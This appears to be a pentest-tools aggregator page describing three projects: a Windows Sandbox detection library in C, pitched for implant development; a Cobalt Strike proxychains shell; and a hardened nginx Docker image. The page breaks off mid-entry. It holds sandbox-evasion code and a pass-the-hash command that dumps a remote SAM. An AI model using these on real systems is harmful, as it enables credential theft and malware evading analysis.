Channel: KitPloit - PenTest Tools!

Wsb-Detect - Tool To Detect If You Are Running In Windows Sandbox ("WSB")



wsb-detect enables you to detect if you are running in Windows Sandbox ("WSB"). The sandbox is used by Windows Defender for dynamic analysis, and commonly used manually by security analysts and the like. At the tail end of 2019, Microsoft introduced a new feature named Windows Sandbox (WSB for short). The techniques used to fingerprint WSB are outlined below, in the techniques section. Feel free to submit a pull request if you have any fingerprinting ideas. I've been messing around with it now and then, and I will have more on Windows Sandbox coming soon.


Windows Sandbox allows you to quickly, within 15s, create a disposable Hyper-V based virtual machine with all of the qualities a familiar VM would have, such as clipboard sharing, directory mapping, etc. The sandbox is also the underlay for Microsoft Defender Application Guard (WDAG) and for dynamic analysis on Hyper-V enabled hosts, and can be enabled on any Windows 10 Pro or Enterprise machine. It's not particularly interesting, but nonetheless could prove useful in implant development. Thank you to my friend Jonas L for guidance when I was exploring the sandbox internals (more to come on this).


Usage

The detect.h header exports all of the functions, which can be combined to detect whether you are running in Windows Sandbox:

#include <stdio.h>
#include "detect.h"

int main(int argc, char** argv)
{
    // example vmsmb & username check
    if (wsb_detect_dev() || wsb_detect_username())
    {
        puts("We're in Windows Sandbox!");
        return 0;
    }

    return 1;
}

Techniques

wsb_detect_time

The image for the sandbox seems to have been built on Saturday, December 7, 2019, 9:14:52 AM - around the time Windows Sandbox was released to the public. This check cross-references the creation timestamp of the mountmgr driver.
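
To make this concrete, here is a minimal C sketch of the idea (a hypothetical stand-alone function, not the project's actual code; the mountmgr.sys path and the build date are taken from the description above):

#include <windows.h>

// Hedged sketch: read the creation timestamp of the mountmgr driver and
// compare its date against the known WSB image build date (Dec 7, 2019).
int wsb_detect_time_sketch(void)
{
    WIN32_FILE_ATTRIBUTE_DATA fad;
    SYSTEMTIME st;

    if (!GetFileAttributesExW(L"C:\\Windows\\System32\\drivers\\mountmgr.sys",
                              GetFileExInfoStandard, &fad))
        return 0;

    FileTimeToSystemTime(&fad.ftCreationTime, &st);
    return st.wYear == 2019 && st.wMonth == 12 && st.wDay == 7;
}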


wsb_detect_username

This method checks if the current username is WDAGUtilityAccount, the account used by default in the sandbox.
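
A minimal C sketch of this check (hypothetical function name; GetUserNameW lives in advapi32):

#include <windows.h>
#include <wchar.h>
#include <lmcons.h>

// Hedged sketch: compare the current username against the default
// Windows Sandbox account.
int wsb_detect_username_sketch(void)
{
    wchar_t name[UNLEN + 1];
    DWORD len = UNLEN + 1;

    if (!GetUserNameW(name, &len))
        return 0;

    return _wcsicmp(name, L"WDAGUtilityAccount") == 0;
}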


wsb_detect_suffix

This method uses GetAdaptersAddresses, walks over the list of adapters, and compares each DNS suffix to mshome.net, which is used by default in the sandbox.
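
A minimal C sketch, assuming a single GetAdaptersAddresses call with a fixed 16 KB buffer (a real implementation would retry with a larger buffer on ERROR_BUFFER_OVERFLOW):

#include <winsock2.h>
#include <iphlpapi.h>
#include <wchar.h>
#include <stdlib.h>

// Hedged sketch: walk the adapter list and look for the default
// sandbox DNS suffix. Link against iphlpapi.lib.
int wsb_detect_suffix_sketch(void)
{
    ULONG size = 16 * 1024;
    IP_ADAPTER_ADDRESSES *list = malloc(size), *cur;
    int found = 0;

    if (list && GetAdaptersAddresses(AF_UNSPEC, 0, NULL, list, &size) == NO_ERROR)
        for (cur = list; cur != NULL && !found; cur = cur->Next)
            if (cur->DnsSuffix && _wcsicmp(cur->DnsSuffix, L"mshome.net") == 0)
                found = 1;

    free(list);
    return found;
}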


wsb_detect_dev

Checks if the raw device \\.\GLOBALROOT\device\vmsmb can be opened; this device is used for communication with the host over SMB.
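
A minimal C sketch of the device probe (hypothetical function name; a desired access of 0 is used only to test for the device's existence):

#include <windows.h>

// Hedged sketch: the vmsmb device only exists inside the sandbox,
// so a successful open is a strong indicator.
int wsb_detect_dev_sketch(void)
{
    HANDLE h = CreateFileW(L"\\\\.\\GLOBALROOT\\device\\vmsmb", 0,
                           FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                           OPEN_EXISTING, 0, NULL);

    if (h == INVALID_HANDLE_VALUE)
        return 0;

    CloseHandle(h);
    return 1;
}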


wsb_detect_cmd

On startup, the sandbox registers a command under the RunOnce key in HKEY_LOCAL_MACHINE which sets the password to never expire; this method searches that key for the command.


wsb_detect_office

Checks for the OfficePackagesForWDAG directory in the current root drive, which seems to be used for Windows Defender's Microsoft Office emulation.
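
A minimal C sketch, hard-coding C:\ for brevity (the description above says the current root drive is checked, which may not be C:):

#include <windows.h>

// Hedged sketch: the OfficePackagesForWDAG directory only appears
// to exist inside the sandbox image.
int wsb_detect_office_sketch(void)
{
    return GetFileAttributesW(L"C:\\OfficePackagesForWDAG") != INVALID_FILE_ATTRIBUTES;
}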


wsb_detect_proc

Checks for CExecSvc.exe, the container execution service, which handles a lot of the heavy lifting.
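
A minimal C sketch using the Toolhelp API to walk the process list (hypothetical function name):

#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

// Hedged sketch: look for the container execution service in the
// running process list.
int wsb_detect_proc_sketch(void)
{
    PROCESSENTRY32W pe = { sizeof(pe) };
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    int found = 0;

    if (snap == INVALID_HANDLE_VALUE)
        return 0;

    if (Process32FirstW(snap, &pe))
        do {
            if (_wcsicmp(pe.szExeFile, L"CExecSvc.exe") == 0)
                found = 1;
        } while (!found && Process32NextW(snap, &pe));

    CloseHandle(snap);
    return found;
}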


wsb_detect_genuine

A more generic sandbox detection method: in testing, the Windows installation inside the VM does not appear to be verified as genuine.


Trivia

If you wish to contact me quickly, feel free to reach out on Twitter or via e-mail. Also, it's possible on the host to detect if the sandbox is running by checking whether you can create a mutex named WindowsSandboxMutex. This limits the sandbox to one virtual machine per host; however, you can release this mutex by simply duplicating the handle and calling ReleaseMutex - voilà, you can have multiple instances.
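
A minimal host-side C sketch of that check, assuming the mutex name quoted above (if the named mutex already exists, a sandbox instance is presumably running):

#include <windows.h>
#include <stdio.h>

// Hedged sketch: CreateMutexW succeeds but GetLastError reports
// ERROR_ALREADY_EXISTS when another process already owns the name.
int main(void)
{
    HANDLE h = CreateMutexW(NULL, FALSE, L"WindowsSandboxMutex");

    if (h != NULL && GetLastError() == ERROR_ALREADY_EXISTS)
        puts("Windows Sandbox appears to be running on this host.");
    else
        puts("No running Windows Sandbox instance detected.");

    if (h != NULL)
        CloseHandle(h);
    return 0;
}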






RedShell - An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server



An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server.


Installation

RedShell runs on Python 3. It also requires a Cobalt Strike client installed on the system where it runs.

Install dependencies:

pip3 install -r requirements.txt

Install proxychains-ng (https://github.com/rofl0r/proxychains-ng):

apt install proxychains4

Make the agscript wrapper executable:

chmod +x agscript.sh

Usage

Start a socks listener on a beacon in your Cobalt Strike client.

Start RedShell:

$ python3 redshell.py 

____ _______ __ ____
/ __ \___ ____/ / ___// /_ ___ / / /
/ /_/ / _ \/ __ /\__ \/ __ \/ _ \/ / /
/ _, _/ __/ /_/ /___/ / / / / __/ / /
/_/ |_|\___/\__,_//____/_/ /_/\___/_/_/


RedShell>

Display help:

RedShell> help

Documented commands (use 'help -v' for verbose/'help <topic>' for details):
===========================================================================
beacon_exec connect help pwd shell use_pivot
cd disconnect history quit show_pivots
config exit load_config set status

Set options:

RedShell> set option VALUE

Connecting to Cobalt Strike

Set Cobalt Strike connection options:

RedShell> set cs_host 127.0.0.1
RedShell> set cs_port 50050
RedShell> set cs_user somedude

Connect to team server (you will be prompted for the team server password):

RedShell> connect 
Enter Cobalt Strike password:
Connecting...
╔═══════════════════════╤═══════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port status │ Disconnected ║
╚═══════════════════════╧═══════════════════════════════════════════════════════╝

Or load from a config file. Note: team server passwords are not read from config files. Redshell will prompt for the teamserver password and then automatically connect.

$ cat config.txt 
cs_host=127.0.0.1
cs_port=12345
cs_user=somedude
RedShell> load_config config.txt
Config applied:
╔════════════════════════════╤═══════════════════════════════════════════════════════╗
║ Redshell install directory │ /opt/redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Proxychains config │ /opt/redshell/proxychains_redshell.conf ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS install directory │ /opt/cobaltstrike ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server │ 127.0.0.1 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server port │ 50050 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS user │ somedude_redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Beacon PID │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Password │ ║
╚════════════════════════════╧═══════════════════════════════════════════════════════╝

Enter Cobalt Strike password:

╔═══════════════════════╤═══════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port status │ Disconnected ║
╚═══════════════════════╧═══════════════════════════════════════════════════════╝

Show available proxy pivots:

RedShell> show_pivots 
╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ID Alive Socks Port PID User Computer Last ║
╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════╣
║ 1 True 22200 8948 Administrator * WS02 16ms ║
╟─────────────────────────────────────────────────────────────────────────────────────────────────────────────╢
║ 2 True 54212 7224 Administrator * WS03 39ms ║
╚═════════════════════════════════════════════════════════════════════════════════════════════════════════════╝

Select a proxy pivot (note: this can only be set after a connection to the team server has been established):

RedShell> use_pivot 2

╔═══════════════════════╤════════════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼────────────────────────────────────────────────────────────╢
║ Socks port status │ Connected via socks port 54212 @ beacon PID 7224 ║
╚═══════════════════════╧════════════════════════════════════════════════════════════╝

Check config

RedShell> config 

╔════════════════════════════╤═══════════════════════════════════════════════════════╗
║ Redshell install directory │ /opt/redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Proxychains config │ /opt/redshell/proxychains_redshell.conf ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS install directory │ /opt/cobaltstrike ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server │ 127.0.0.1 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server port │ 50050 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS user │ somedude_redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Beacon PID │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Password │ ║
╚════════════════════════════╧═══════════════════════════════════════════════════════╝

Check status:

RedShell> status

╔═══════════════════════╤════════════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼────────────────────────────────────────────────────────────╢
║ Socks port status │ Connected via socks port 54212 @ beacon PID 7224 ║
╚═══════════════════════╧════════════════════════════════════════════════════════════╝

Execute commands through the beacon socks proxy. These can be run in the context of the current user or via sudo. Specifying 'proxychains' in the command is optional; commands are forced through proxychains either way. MITRE ATT&CK Tactic IDs are optional; when included, they are logged to the team server along with the command.

RedShell> beacon_exec -h
usage: beacon_exec [-h] [-t TTP] ...

Execute a command through proxychains/beacon socks proxy and simultaneously log it to the teamserver.

positional arguments:
command Command to execute through the proxy.

optional arguments:
-h, --help show this help message and exit
-t TTP, --ttp TTP MITRE ATT&CK Tactic IDs. Comma delimited to specify multiple.

example:
beacon_exec -t T1003,T1075 cme smb --local-auth -u Administrator -H C713B1D611657D0687A568122193F230 --sam 192.168.1.1
RedShell> beacon_exec cme smb 192.168.1.14
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:445 ... OK
SMB 192.168.1.14 445 TESTNET-DC1 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:TESTNET-DC1) (domain:TESTNET) (signing:True) (SMBv1:True)

Note on passwords used in beacon_exec commands - special characters in passwords may be interpreted as shell metacharacters, which could cause commands to fail. To get around this, set the password option and then invoke it with '$password'. Example:

RedShell> set password Test12345
password - was: ''
now: 'Test12345'
RedShell> beacon_exec cme smb --local-auth -u administrator -p $password --shares 192.168.1.14

Note on the Redshell and CS install directory options - the script needs to know where it lives, as well as where Cobalt Strike does. If stuff blows up, be sure to set the directories accordingly:

RedShell> set redshell_directory /opt/redshell
RedShell> set cs_directory /opt/cobaltstrike

General Features

RedShell includes commands for navigating the file system:

RedShell> cd /opt/redshell/
RedShell> pwd
/opt/redshell

Additional commands can be run via the shell command or via the '!' shortcut:

RedShell> shell date
Mon 29 Jul 2019 05:33:02 PM MDT
RedShell> !date
Mon 29 Jul 2019 05:33:03 PM MDT

Commands are tracked and accessible via the history command:

RedShell> history 
1 load_config config.txt
2 status
3 help

RedShell also includes tab completion and supports clearing the terminal window via ctrl + l.




Bunkerized-Nginx - Nginx Docker Image Secure By Default



nginx Docker image secure by default.

Avoid the hassle of following security best practices each time you need a web server or reverse proxy. Bunkerized-nginx provides generic security configs, settings and tools so you don't need to do it yourself.


Non-exhaustive list of features :

  • HTTPS support with transparent Let's Encrypt automation
  • State-of-the-art web security : HTTP security headers, prevent leaks, TLS hardening, ...
  • Integrated ModSecurity WAF with the OWASP Core Rule Set
  • Automatic ban of strange behaviors with fail2ban
  • Antibot challenge through cookie, javascript, captcha or recaptcha v3
  • Block TOR, proxies, bad user-agents, countries, ...
  • Block known bad IPs with DNSBL and CrowdSec
  • Prevent bruteforce attacks with rate limiting
  • Detect bad files with ClamAV
  • Easy to configure with environment variables

Fooling automated tools/scanners :



Live demo

You can find a live demo at https://demo-nginx.bunkerity.com.


Quickstart guide

Run HTTP server with default settings
docker run -p 80:8080 -v /path/to/web/files:/www:ro bunkerity/bunkerized-nginx

Web files are stored in the /www directory; the container will serve files from there.


In combination with PHP
docker network create mynet
docker run --network mynet \
-p 80:8080 \
-v /path/to/web/files:/www:ro \
-e REMOTE_PHP=myphp \
-e REMOTE_PHP_PATH=/app \
bunkerity/bunkerized-nginx
docker run --network mynet \
--name=myphp \
-v /path/to/web/files:/app \
php:fpm

The REMOTE_PHP environment variable lets you define the address of a remote PHP-FPM instance that will execute the .php files. REMOTE_PHP_PATH must be set to the directory where the PHP container will find the files.


Run HTTPS server with automated Let's Encrypt
docker run -p 80:8080 \
-p 443:8443 \
-v /path/to/web/files:/www:ro \
-v /where/to/save/certificates:/etc/letsencrypt \
-e SERVER_NAME=www.yourdomain.com \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
bunkerity/bunkerized-nginx

Certificates are stored in the /etc/letsencrypt directory; you should save it on your local drive.
If you don't want your webserver to listen on HTTP, set the LISTEN_HTTP environment variable to no. But Let's Encrypt needs port 80 to be open, so redirecting the port is mandatory.

Here you have three environment variables :

  • SERVER_NAME : define the FQDN of your webserver; this is mandatory for Let's Encrypt (www.yourdomain.com should point to your IP address)
  • AUTO_LETS_ENCRYPT : enable automatic Let's Encrypt creation and renewal of certificates
  • REDIRECT_HTTP_TO_HTTPS : enable HTTP to HTTPS redirection

As a reverse proxy
docker run -p 80:8080 \
-e USE_REVERSE_PROXY=yes \
-e REVERSE_PROXY_URL=/ \
-e REVERSE_PROXY_HOST=http://myserver:8080 \
bunkerity/bunkerized-nginx

This is a simple reverse proxy to a single application. If you have more than one application, you can add more REVERSE_PROXY_URL/REVERSE_PROXY_HOST pairs by appending a suffix number like this :

docker run -p 80:8080 \
-e USE_REVERSE_PROXY=yes \
-e REVERSE_PROXY_URL_1=/app1/ \
-e REVERSE_PROXY_HOST_1=http://myapp1:3000/ \
-e REVERSE_PROXY_URL_2=/app2/ \
-e REVERSE_PROXY_HOST_2=http://myapp2:3000/ \
bunkerity/bunkerized-nginx

Behind a reverse proxy
docker run -p 80:8080 \
-v /path/to/web/files:/www \
-e PROXY_REAL_IP=yes \
bunkerity/bunkerized-nginx

The PROXY_REAL_IP environment variable, when set to yes, activates the ngx_http_realip_module to get the real client IP from the reverse proxy.

See this section if you need to tweak some values (trusted ip/network, header, ...).


Multisite

By default, bunkerized-nginx will only create one server block. When the MULTISITE environment variable is set to yes, one server block will be created for each host defined in the SERVER_NAME environment variable.
You can set/override values for a specific server by prefixing the environment variable with one of the server names previously defined.

docker run -p 80:8080 \
-p 443:8443 \
-v /where/to/save/certificates:/etc/letsencrypt \
-e "SERVER_NAME=app1.domain.com app2.domain.com" \
-e MULTISITE=yes \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
-e USE_REVERSE_PROXY=yes \
-e app1.domain.com_PROXY_URL=/ \
-e app1.domain.com_PROXY_HOST=http://myapp1:8000 \
-e app2.domain.com_PROXY_URL=/ \
-e app2.domain.com_PROXY_HOST=http://myapp2:8000 \
bunkerity/bunkerized-nginx

USE_REVERSE_PROXY is a global variable that will be applied to each server block, whereas the app1.domain.com_* and app2.domain.com_* variables will only be applied to the app1.domain.com and app2.domain.com server blocks respectively.

When serving files, the web root directory should contain subdirectories named after the servers defined in the SERVER_NAME environment variable. Here is an example :

docker run -p 80:8080 \
-p 443:8443 \
-v /where/to/save/certificates:/etc/letsencrypt \
-v /where/are/web/files:/www:ro \
-e "SERVER_NAME=app1.domain.com app2.domain.com" \
-e MULTISITE=yes \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
-e app1.domain.com_REMOTE_PHP=php1 \
-e app1.domain.com_REMOTE_PHP_PATH=/app \
-e app2.domain.com_REMOTE_PHP=php2 \
-e app2.domain.com_REMOTE_PHP_PATH=/app \
bunkerity/bunkerized-nginx

The /where/are/web/files directory should have a structure like this :

/where/are/web/files
├── app1.domain.com
│   ├── index.php
│   └── ...
└── app2.domain.com
    ├── index.php
    └── ...

Antibot challenge
docker run -p 80:8080 -v /path/to/web/files:/www -e USE_ANTIBOT=captcha bunkerity/bunkerized-nginx

When USE_ANTIBOT is set to captcha, every user visiting your website must complete a captcha before accessing the pages. Other challenges are also available : cookie, javascript or recaptcha (more info here).


Tutorials and examples

You will find some docker-compose.yml examples in the examples directory and tutorials about bunkerized-nginx in our blog.


List of environment variables

nginx

Misc

MULTISITE
Values : yes | no
Default value : no
Context : global
When set to no, only one server block will be generated. Otherwise one server block per host defined in the SERVER_NAME environment variable will be generated.
Any environment variable tagged as multisite context can be used for a specific server block with the following format : host_VARIABLE=value. If the variable is used without the host prefix it will be applied to all the server blocks (but can still be overridden).

SERVER_NAME
Values : <first name> <second name> ...
Default value : www.bunkerity.com
Context : global
Sets the host names of the webserver separated with spaces. This must match the Host header sent by clients.
Useful when used with MULTISITE=yes and/or AUTO_LETS_ENCRYPT=yes and/or DISABLE_DEFAULT_SERVER=yes.

MAX_CLIENT_SIZE
Values : 0 | Xm
Default value : 10m
Context : global, multisite
Sets the maximum body size before nginx returns a 413 error code.
Setting to 0 means "infinite" body size.

ALLOWED_METHODS
Values : allowed HTTP methods separated with | char
Default value : GET|POST|HEAD
Context : global, multisite
Only the HTTP methods listed here will be accepted by nginx. If not listed, nginx will close the connection.

DISABLE_DEFAULT_SERVER
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, nginx will only respond to HTTP requests when the Host header matches a FQDN specified in the SERVER_NAME environment variable.
For example, it will close the connection if a bot accesses the site via the raw IP address.

SERVE_FILES
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, nginx will serve files from the /www directory within the container.
A use case for not serving files is when you set up bunkerized-nginx as a reverse proxy via a custom configuration.

DNS_RESOLVERS
Values : <two IP addresses separated with a space>
Default value : 127.0.0.11 8.8.8.8
Context : global
The IP addresses of the DNS resolvers to use when performing DNS lookups.

ROOT_FOLDER
Values : <any valid path to web files>
Default value : /www
Context : global
The default folder where nginx will search for web files. Don't change it unless you want to make your own image.

HTTP_PORT
Values : <any valid port greater than 1024>
Default value : 8080
Context : global
The HTTP port number used by nginx and certbot inside the container.

HTTPS_PORT
Values : <any valid port greater than 1024>
Default value : 8443
Context : global
The HTTPS port number used by nginx inside the container.


Information leak

SERVER_TOKENS
Values : on | off
Default value : off
Context : global
If set to on, nginx will display the server version in the Server header and on default error pages.

REMOVE_HEADERS
Values : <list of headers separated with space>
Default value : Server X-Powered-By X-AspNet-Version X-AspNetMvc-Version
Context : global, multisite
List of headers to remove from responses sent to clients.


Custom error pages

ERROR_XXX
Values : <relative path to the error page>
Default value :
Context : global, multisite
Use this kind of environment variable to define custom error pages depending on the HTTP error code. Replace XXX with the HTTP code.
For example : ERROR_404=/404.html means the /404.html page will be displayed when a 404 code is generated. The path is relative to the root web folder.


HTTP basic authentication

USE_AUTH_BASIC
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, enables HTTP basic authentication at the location AUTH_BASIC_LOCATION with user AUTH_BASIC_USER and password AUTH_BASIC_PASSWORD.

AUTH_BASIC_LOCATION
Values : sitewide | /somedir | <any valid location>
Default value : sitewide
Context : global, multisite
The location to restrict when USE_AUTH_BASIC is set to yes. If the special value sitewide is used then auth basic will be set at server level outside any location context.

AUTH_BASIC_USER
Values : <any valid username>
Default value : changeme
Context : global, multisite
The username allowed to access AUTH_BASIC_LOCATION when USE_AUTH_BASIC is set to yes.

AUTH_BASIC_PASSWORD
Values : <any valid password>
Default value : changeme
Context : global, multisite
The password of AUTH_BASIC_USER when USE_AUTH_BASIC is set to yes.

AUTH_BASIC_TEXT
Values : <any valid text>
Default value : Restricted area
Context : global, multisite
The text displayed inside the login prompt when USE_AUTH_BASIC is set to yes.


Reverse proxy

USE_REVERSE_PROXY
Values : yes | no
Default value : no
Context : global, multisite
Set this environment variable to yes if you want to use bunkerized-nginx as a reverse proxy.

REVERSE_PROXY_URL
Values : <any valid location path>
Default value :
Context : global, multisite
Only valid when USE_REVERSE_PROXY is set to yes. Lets you define the location path to match when acting as a reverse proxy.
You can set multiple url/host by adding a suffix number to the variable name like this : REVERSE_PROXY_URL_1, REVERSE_PROXY_URL_2, REVERSE_PROXY_URL_3, ...

REVERSE_PROXY_HOST
Values : <any valid proxy_pass value>
Default value :
Context : global, multisite
Only valid when USE_REVERSE_PROXY is set to yes. Lets you define the proxy_pass destination to use when acting as a reverse proxy.
You can set multiple url/host by adding a suffix number to the variable name like this : REVERSE_PROXY_HOST_1, REVERSE_PROXY_HOST_2, REVERSE_PROXY_HOST_3, ...

PROXY_REAL_IP
Values : yes | no
Default value : no
Context : global, multisite
Set this environment variable to yes if you're using bunkerized-nginx behind a reverse proxy. This means you will see the real client address instead of the proxy's address in your logs. ModSecurity, fail2ban and other security tools will then also work correctly.

PROXY_REAL_IP_FROM
Values : <list of trusted IP addresses and/or networks separated with spaces>
Default value : 192.168.0.0/16 172.16.0.0/12 10.0.0.0/8
Context : global, multisite
When PROXY_REAL_IP is set to yes, lets you define the trusted IPs/networks allowed to send the correct client address.

PROXY_REAL_IP_HEADER
Values : X-Forwarded-For | X-Real-IP | custom header
Default value : X-Forwarded-For
Context : global, multisite
When PROXY_REAL_IP is set to yes, lets you define the header that contains the real client IP address.

PROXY_REAL_IP_RECURSIVE
Values : on | off
Default value : on
Context : global, multisite
When PROXY_REAL_IP is set to yes, setting this to on avoids spoofing attacks that use the header defined in PROXY_REAL_IP_HEADER.


Compression

USE_GZIP
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will use the gzip algorithm to compress responses sent to clients.

GZIP_COMP_LEVEL
Values : <any integer between 1 and 9>
Default value : 5
Context : global, multisite
The gzip compression level to use when USE_GZIP is set to yes.

GZIP_MIN_LENGTH
Values : <any positive integer>
Default value : 1000
Context : global, multisite
The minimum size (in bytes) of a response required to compress when USE_GZIP is set to yes.

GZIP_TYPES
Values : <list of mime types separated with space>
Default value : application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml
Context : global, multisite
List of response MIME types eligible for compression when USE_GZIP is set to yes.

USE_BROTLI
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will use the brotli algorithm to compress responses sent to clients.

BROTLI_COMP_LEVEL
Values : <any integer between 1 and 9>
Default value : 5
Context : global, multisite
The brotli compression level to use when USE_BROTLI is set to yes.

BROTLI_MIN_LENGTH
Values : <any positive integer>
Default value : 1000
Context : global, multisite
The minimum size (in bytes) of a response required to compress when USE_BROTLI is set to yes.

BROTLI_TYPES
Values : <list of mime types separated with space>
Default value : application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml
Context : global, multisite
List of response MIME types eligible for compression when USE_BROTLI is set to yes.


Cache

USE_CLIENT_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, clients will be told to cache some files locally.

CLIENT_CACHE_EXTENSIONS
Values : <list of extensions separated with |>
Default value : jpg|jpeg|png|bmp|ico|svg|tif|css|js|otf|ttf|eot|woff|woff2
Context : global, multisite
List of file extensions that clients should cache when USE_CLIENT_CACHE is set to yes.

CLIENT_CACHE_CONTROL
Values : <Cache-Control header value>
Default value : public, max-age=15552000
Context : global, multisite
Content of the Cache-Control header to send when USE_CLIENT_CACHE is set to yes.

CLIENT_CACHE_ETAG
Values : on | off
Default value : on
Context : global, multisite
Whether or not nginx will send the ETag header when USE_CLIENT_CACHE is set to yes.

USE_OPEN_FILE_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will cache open fd, existence of directories, ... See open_file_cache.

OPEN_FILE_CACHE
Values : <any valid open_file_cache parameters>
Default value : max=1000 inactive=20s
Context : global, multisite
Parameters to use with open_file_cache when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_ERRORS
Values : on | off
Default value : on
Context : global, multisite
Whether or not nginx should cache file lookup errors when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_MIN_USES
Values : <any valid integer>
Default value : 2
Context : global, multisite
The minimum number of file accesses required to cache the fd when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_VALID
Values : <any time value like Xs, Xm, Xh, ...>
Default value : 30s
Context : global, multisite
The time after which cached elements should be validated when USE_OPEN_FILE_CACHE is set to yes.

USE_PROXY_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will cache responses from proxied applications. See proxy_cache.

PROXY_CACHE_PATH_ZONE_SIZE
Values : <any valid size like Xk, Xm, Xg, ...>
Default value : 10m
Context : global, multisite
Maximum size of cached metadata when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_PATH_PARAMS
Values : <any valid parameters to proxy_cache_path directive>
Default value : max_size=100m
Context : global, multisite
Parameters to use for proxy_cache_path directive when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_METHODS
Values : <list of HTTP methods separated with space>
Default value : GET HEAD
Context : global, multisite
The HTTP methods that should trigger a cache operation when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_MIN_USES
Values : <any positive integer>
Default value : 2
Context : global, multisite
The minimum number of requests before the response is cached when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_KEY
Values : <list of variables>
Default value : $scheme$host$request_uri
Context : global, multisite
The key used to uniquely identify a cached response when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_VALID
Values : <status=time list separated with space>
Default value : 200=10m 301=10m 302=1h any=1m
Context : global, multisite
Define the caching time depending on the HTTP status code (list of status=time separated with space) when USE_PROXY_CACHE is set to yes.

PROXY_NO_CACHE
Values : <list of variables>
Default value : $http_authorization
Context : global, multisite
Conditions that must be met to disable caching of the response when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_BYPASS
Values : <list of variables>
Default value : $http_authorization
Context : global, multisite
Conditions that must be met to bypass the cache when USE_PROXY_CACHE is set to yes.


HTTPS

Let's Encrypt

AUTO_LETS_ENCRYPT
Values : yes | no
Default value : no
Context : global
If set to yes, automatic certificate generation and renewal will be setup through Let's Encrypt. This will enable HTTPS on your website for free.
You will need to redirect port 80 to port 8080 inside the container and also set the SERVER_NAME environment variable.


HTTP

LISTEN_HTTP
Values : yes | no
Default value : yes
Context : global, multisite
If set to no, nginx will not listen on HTTP (port 80).
Useful if you only want HTTPS access to your website.

REDIRECT_HTTP_TO_HTTPS
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, nginx will redirect all HTTP requests to HTTPS.


Custom certificate

USE_CUSTOM_HTTPS
Values : yes | no
Default value : no
Context : global
If set to yes, HTTPS will be enabled with certificate/key of your choice.

CUSTOM_HTTPS_CERT
Values : <any valid path inside the container>
Default value :
Context : global
Full path of the certificate file to use when USE_CUSTOM_HTTPS is set to yes.

CUSTOM_HTTPS_KEY
